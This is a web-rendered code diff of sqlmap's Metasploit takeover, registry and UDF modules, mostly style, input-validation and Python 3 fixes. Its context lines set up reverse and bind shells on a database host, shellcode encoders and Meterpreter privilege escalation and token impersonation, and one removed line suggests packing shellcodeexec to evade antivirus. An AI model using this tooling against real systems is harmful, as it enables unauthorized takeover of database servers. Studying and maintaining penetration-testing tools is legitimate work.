from lib.core.subprocessng import blockingReadFromFD
|
from lib.core.subprocessng import blockingReadFromFD
|
||||||
from lib.core.subprocessng import blockingWriteToFD
|
from lib.core.subprocessng import blockingWriteToFD
|
||||||
from lib.core.subprocessng import Popen as execute
|
from lib.core.subprocessng import Popen as execute
|
||||||
@@ -81,6 +81,7 @@ class Metasploit:
|
|||||||
_ = normalizePath(os.path.join(_, ".."))
|
_ = normalizePath(os.path.join(_, ".."))
|
||||||
if _ == old:
|
if _ == old:
|
||||||
break
|
break
|
||||||
|
|
||||||
self._msfCli = "%s & ruby %s" % (_, self._msfCli)
|
self._msfCli = "%s & ruby %s" % (_, self._msfCli)
|
||||||
self._msfConsole = "%s & ruby %s" % (_, self._msfConsole)
|
self._msfConsole = "%s & ruby %s" % (_, self._msfConsole)
|
||||||
self._msfEncode = "ruby %s" % self._msfEncode
|
self._msfEncode = "ruby %s" % self._msfEncode
|
||||||
@@ -88,60 +89,60 @@ class Metasploit:
|
|||||||
self._msfVenom = "%s & ruby %s" % (_, self._msfVenom)
|
self._msfVenom = "%s & ruby %s" % (_, self._msfVenom)
|
||||||
|
|
||||||
self._msfPayloadsList = {
|
self._msfPayloadsList = {
|
||||||
"windows": {
|
"windows": {
|
||||||
1: ("Meterpreter (default)", "windows/meterpreter"),
|
1: ("Meterpreter (default)", "windows/meterpreter"),
|
||||||
2: ("Shell", "windows/shell"),
|
2: ("Shell", "windows/shell"),
|
||||||
3: ("VNC", "windows/vncinject"),
|
3: ("VNC", "windows/vncinject"),
|
||||||
},
|
},
|
||||||
"linux": {
|
"linux": {
|
||||||
1: ("Shell (default)", "linux/x86/shell"),
|
1: ("Shell (default)", "linux/x86/shell"),
|
||||||
2: ("Meterpreter (beta)", "linux/x86/meterpreter"),
|
2: ("Meterpreter (beta)", "linux/x86/meterpreter"),
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
self._msfConnectionsList = {
|
self._msfConnectionsList = {
|
||||||
"windows": {
|
"windows": {
|
||||||
1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"),
|
1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"),
|
||||||
2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"),
|
2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"),
|
||||||
3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"),
|
3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"),
|
||||||
4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"),
|
4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"),
|
||||||
5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"),
|
5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"),
|
||||||
},
|
},
|
||||||
"linux": {
|
"linux": {
|
||||||
1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"),
|
1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"),
|
||||||
2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"),
|
2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"),
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
self._msfEncodersList = {
|
self._msfEncodersList = {
|
||||||
"windows": {
|
"windows": {
|
||||||
1: ("No Encoder", "generic/none"),
|
1: ("No Encoder", "generic/none"),
|
||||||
2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"),
|
2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"),
|
||||||
3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"),
|
3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"),
|
||||||
4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"),
|
4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"),
|
||||||
5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"),
|
5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"),
|
||||||
6: ("Single-byte XOR Countdown Encoder", "x86/countdown"),
|
6: ("Single-byte XOR Countdown Encoder", "x86/countdown"),
|
||||||
7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"),
|
7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"),
|
||||||
8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"),
|
8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"),
|
||||||
9: ("Non-Alpha Encoder", "x86/nonalpha"),
|
9: ("Non-Alpha Encoder", "x86/nonalpha"),
|
||||||
10: ("Non-Upper Encoder", "x86/nonupper"),
|
10: ("Non-Upper Encoder", "x86/nonupper"),
|
||||||
11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"),
|
11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"),
|
||||||
12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"),
|
12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"),
|
||||||
13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"),
|
13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"),
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
self._msfSMBPortsList = {
|
self._msfSMBPortsList = {
|
||||||
"windows": {
|
"windows": {
|
||||||
1: ("139/TCP", "139"),
|
1: ("139/TCP", "139"),
|
||||||
2: ("445/TCP (default)", "445"),
|
2: ("445/TCP (default)", "445"),
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
self._portData = {
|
self._portData = {
|
||||||
"bind": "remote port number",
|
"bind": "remote port number",
|
||||||
"reverse": "local port number",
|
"reverse": "local port number",
|
||||||
}
|
}
|
||||||
|
|
||||||
def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1):
|
def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1):
|
||||||
if Backend.isOs(OS.WINDOWS):
|
if Backend.isOs(OS.WINDOWS):
|
||||||
@@ -167,19 +168,8 @@ class Metasploit:
|
|||||||
|
|
||||||
choice = readInput(message, default="%d" % default)
|
choice = readInput(message, default="%d" % default)
|
||||||
|
|
||||||
if not choice:
|
if not choice or not choice.isdigit() or int(choice) > maxValue or int(choice) < 1:
|
||||||
if lst:
|
choice = default
|
||||||
choice = getUnicode(default, UNICODE_ENCODING)
|
|
||||||
else:
|
|
||||||
return default
|
|
||||||
|
|
||||||
elif not choice.isdigit():
|
|
||||||
logger.warn("invalid value, only digits are allowed")
|
|
||||||
return self._skeletonSelection(msg, lst, maxValue, default)
|
|
||||||
|
|
||||||
elif int(choice) > maxValue or int(choice) < 1:
|
|
||||||
logger.warn("invalid value, it must be a digit between 1 and %d" % maxValue)
|
|
||||||
return self._skeletonSelection(msg, lst, maxValue, default)
|
|
||||||
|
|
||||||
choice = int(choice)
|
choice = int(choice)
|
||||||
|
|
||||||
@@ -484,15 +474,18 @@ class Metasploit:
|
|||||||
|
|
||||||
send_all(proc, "use espia\n")
|
send_all(proc, "use espia\n")
|
||||||
send_all(proc, "use incognito\n")
|
send_all(proc, "use incognito\n")
|
||||||
# This extension is loaded by default since Metasploit > 3.7
|
|
||||||
#send_all(proc, "use priv\n")
|
# This extension is loaded by default since Metasploit > 3.7:
|
||||||
# This extension freezes the connection on 64-bit systems
|
# send_all(proc, "use priv\n")
|
||||||
#send_all(proc, "use sniffer\n")
|
|
||||||
|
# This extension freezes the connection on 64-bit systems:
|
||||||
|
# send_all(proc, "use sniffer\n")
|
||||||
|
|
||||||
send_all(proc, "sysinfo\n")
|
send_all(proc, "sysinfo\n")
|
||||||
send_all(proc, "getuid\n")
|
send_all(proc, "getuid\n")
|
||||||
|
|
||||||
if conf.privEsc:
|
if conf.privEsc:
|
||||||
print
|
print()
|
||||||
|
|
||||||
infoMsg = "trying to escalate privileges using Meterpreter "
|
infoMsg = "trying to escalate privileges using Meterpreter "
|
||||||
infoMsg += "'getsystem' command which tries different "
|
infoMsg += "'getsystem' command which tries different "
|
||||||
@@ -501,7 +494,7 @@ class Metasploit:
|
|||||||
|
|
||||||
send_all(proc, "getsystem\n")
|
send_all(proc, "getsystem\n")
|
||||||
|
|
||||||
infoMsg = "displaying the list of Access Tokens availables. "
|
infoMsg = "displaying the list of available Access Tokens. "
|
||||||
infoMsg += "Choose which user you want to impersonate by "
|
infoMsg += "Choose which user you want to impersonate by "
|
||||||
infoMsg += "using incognito's command 'impersonate_token' if "
|
infoMsg += "using incognito's command 'impersonate_token' if "
|
||||||
infoMsg += "'getsystem' does not success to elevate privileges"
|
infoMsg += "'getsystem' does not success to elevate privileges"
|
||||||
@@ -628,7 +621,7 @@ class Metasploit:
|
|||||||
payloadSize = int(match.group(2))
|
payloadSize = int(match.group(2))
|
||||||
|
|
||||||
if extra == "BufferRegister=EAX":
|
if extra == "BufferRegister=EAX":
|
||||||
payloadSize = payloadSize / 2
|
payloadSize = payloadSize // 2
|
||||||
|
|
||||||
debugMsg = "the shellcode size is %d bytes" % payloadSize
|
debugMsg = "the shellcode size is %d bytes" % payloadSize
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
@@ -671,13 +664,10 @@ class Metasploit:
|
|||||||
written = self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary", forceCheck=True)
|
written = self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary", forceCheck=True)
|
||||||
|
|
||||||
if written is not True:
|
if written is not True:
|
||||||
errMsg = "there has been a problem uploading shellcodeexec, it "
|
errMsg = "there has been a problem uploading shellcodeexec. It "
|
||||||
errMsg += "looks like the binary file has not been written "
|
errMsg += "looks like the binary file has not been written "
|
||||||
errMsg += "on the database underlying file system or an AV has "
|
errMsg += "on the database underlying file system or an AV has "
|
||||||
errMsg += "flagged it as malicious and removed it. In such a case "
|
errMsg += "flagged it as malicious and removed it"
|
||||||
errMsg += "it is recommended to recompile shellcodeexec with "
|
|
||||||
errMsg += "slight modification to the source code or pack it "
|
|
||||||
errMsg += "with an obfuscator software"
|
|
||||||
logger.error(errMsg)
|
logger.error(errMsg)
|
||||||
|
|
||||||
return False
|
return False
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -33,19 +33,19 @@ class Registry:
|
|||||||
readParse = "REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\""
|
readParse = "REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\""
|
||||||
|
|
||||||
self._batRead = (
|
self._batRead = (
|
||||||
"@ECHO OFF\r\n",
|
"@ECHO OFF\r\n",
|
||||||
readParse,
|
readParse,
|
||||||
)
|
)
|
||||||
|
|
||||||
self._batAdd = (
|
self._batAdd = (
|
||||||
"@ECHO OFF\r\n",
|
"@ECHO OFF\r\n",
|
||||||
"REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData),
|
"REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData),
|
||||||
)
|
)
|
||||||
|
|
||||||
self._batDel = (
|
self._batDel = (
|
||||||
"@ECHO OFF\r\n",
|
"@ECHO OFF\r\n",
|
||||||
"REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue),
|
"REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue),
|
||||||
)
|
)
|
||||||
|
|
||||||
def _createLocalBatchFile(self):
|
def _createLocalBatchFile(self):
|
||||||
self._batPathFp = open(self._batPathLocal, "w")
|
self._batPathFp = open(self._batPathLocal, "w")
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -108,7 +108,7 @@ class UDF:
|
|||||||
return output
|
return output
|
||||||
|
|
||||||
def udfCheckNeeded(self):
|
def udfCheckNeeded(self):
|
||||||
if (not conf.rFile or (conf.rFile and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs:
|
if (not conf.fileRead or (conf.fileRead and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs:
|
||||||
self.sysUdfs.pop("sys_fileread")
|
self.sysUdfs.pop("sys_fileread")
|
||||||
|
|
||||||
if not conf.osPwn:
|
if not conf.osPwn:
|
||||||
|
|||||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user